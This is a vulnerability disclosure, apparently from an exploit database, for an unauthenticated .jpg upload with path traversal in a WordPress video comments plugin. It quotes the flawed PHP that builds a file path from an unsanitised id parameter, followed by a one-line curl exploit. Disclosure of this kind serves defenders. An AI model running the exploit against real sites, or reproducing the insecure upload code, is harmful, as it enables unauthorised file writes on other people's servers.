###########################

# WordPress Contus Video Comments 1.0 File Upload Vulnerability

###########################

Title: Unauthenticated remote .jpg file upload in contus-video-comments v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2016-06-15
Download Site: https://wordpress.org/plugins/contus-video-comments/
Vendor: https://profiles.wordpress.org/hdflvplayer/
Vendor Notified: 2016-06-16
Vendor Contact:
Description: Video comments integrated with the standard comment system of wordpress.
Vulnerability:

The following code allows any user to upload .jpg files to the WordPress installation. It also allows path traversal with ../.

<?php
//This project is done by vamapaull: http://blog.vamapaull.com/
//The php code is done with some help from Mihai Bojin: http://www.mihaibojin.com/

if(isset($GLOBALS["HTTP_RAW_POST_DATA"])){
$jpg = $GLOBALS["HTTP_RAW_POST_DATA"];
$filename = "images/". $_GET["id"]. ".jpg";
file_put_contents($filename, $jpg);
} else{
echo "Encoded JPEG information not received.";
}
?>

CVE-TBD
Exploit Code:
⢠$ curl --data @image.jpg "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image"

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-07-21]

###########################